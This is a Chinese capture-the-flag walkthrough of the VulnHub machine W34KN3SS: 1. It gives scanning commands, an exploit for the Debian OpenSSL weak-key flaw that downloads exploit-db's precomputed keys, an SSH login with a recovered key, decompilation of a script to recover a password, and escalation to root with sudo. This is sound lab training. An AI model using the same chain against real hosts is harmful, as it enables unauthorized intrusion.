虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/w34kn3ss-1,270/
虚拟机简介:你的目标是帮助 neo 以“root”身份访问这台机器
目标:1个flag
级别:中级
1、信息收集
1.1通过arp-scan检测主机IP地址
arp-scan 192.168.207.0/24
1.2 通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.134
查看开放22、80、443端口
2、渗透测试
2.1 WEB渗透
1.站点访问测试
访问站点显示Apache默认页面
使用dirb进行网站目录扫描,发现test目录可以访问,没有发现有用信息
dirb http://192.168.207.137
2.绑定域名测试
通过nmap端口扫描,发现443端口提示有域名信息,可以绑定hosts访问
vim /etc/hosts
访问网站首页,发现有一个提示信息
重新使用dirb进行扫描,发现有隐藏目录
dirb http://weakness.jth
3.信息收集
访问爆破目录,发现有两个文件信息
在note.txt中提示密码为0.9.8c-1创建的密钥
4.漏洞利用
使用searchsploit搜索相关漏洞
searchsploit openssl 0.9.8c-1
复制漏洞信息到当前路径下
searchsploit -m 5622
cat 5622.txt
下载密钥文件并解压,通过获取到的mykey.pub内容进行对比
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar jxvf 5622.tar.bz2
cd rsa/2048
grep -r -l "AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw=="
2.2 主机渗透
1.通过密钥连接
ssh -i 4161de56829de2fe64b9055711f531c1-2537 [email protected]
发现本地目录中存在2个文件,其中code为python2.7生成的文件
2.下载并解析文件
把python文件复制到www目录中进行下载
cp code /var/www/html
wget http://192.168.207.137/code
安装解码库,并解析python代码文件
pip2 install uncompyle6
cp code code.pyc
uncompyle6 -o . code.pyc
已重新生成新的py文件
3.分析python代码
代码中通过用户名和密码生成HASH文件,获取到用户名为:n30
,密码为:dMASDNB!!#B!#!#33
cat code.py
4.查看sudo权限
当前用户拥有所有的sudo权限
sudo -l
可以直接获取到获取root权限
sudo -i
5.查看FLAG
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之W34KN3SS: 1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论